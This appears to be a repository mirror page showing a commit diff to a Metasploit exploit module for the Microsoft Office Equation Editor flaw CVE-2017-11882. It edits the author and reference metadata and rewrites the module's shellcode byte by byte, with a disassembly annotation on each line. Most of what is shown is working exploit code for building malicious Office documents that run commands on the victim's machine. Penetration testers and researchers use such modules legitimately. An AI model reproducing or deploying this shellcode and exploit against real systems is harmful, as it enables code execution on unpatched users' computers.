infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

disassembly ASM

MS-2855/keylogger-mettle-extension
Austin 2017-12-01 08:03:56 -05:00 committed by GitHub
parent 2544b4d8db
commit 7df46b33e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

49
modules/exploits/windows/fileformat/office_ms17_11882.rb
View File

@ -22,18 +22,17 @@ class MetasploitModule < Msf::Exploit::Remote
a length of 109 bytes to be executed Affects Microsoft Office word for the latest
17 years.
},
'Author' => ['mumbai', 'embedi', 'BlackMathIT'],
'Author' => ['mumbai', 'embedi'],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 15 2017',
'References' => [
['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
['URL', 'https://github.com/embedi/CVE-2017-11882'],
['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py']
['URL', 'https://github.com/embedi/CVE-2017-11882']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
['Microsoft Office Word', {} ],
['Microsoft Office', {} ],
],
'DefaultTarget' => 0,
'Payload' => {
@ -131,11 +130,43 @@ class MetasploitModule < Msf::Exploit::Remote
header << "000000000000000000000000000000000000000000000000000000000000000\n"
shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al
shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax]
shellcode << "\x9e" # 6: 9e sahf
shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\xc8" # f: 00 c8 add al,cl
shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
shellcode << "\\" # 12: 5c pop esp
shellcode << "\x00\xc4" # 13: 00 c4 add ah,al
shellcode << "\xee" # 15: ee out dx,al
shellcode << "[" # 16: 5b pop ebx
shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al
shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al
shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax
shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx]
shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx]
shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44
shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678
shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx
shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax]
shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx]
shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx]
shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c
shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx
shellcode << "\x53" # 3e: 53 push ebx
shellcode << "\x51" # 3f: 51 push ecx
shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64
shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx
shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi]
shellcode << "\x53" # 49: 53 push ebx
shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c
shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax]
shellcode << "\x90" # 50: 90 nop
shellcode << "\x90" # 50: 90 nop
footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'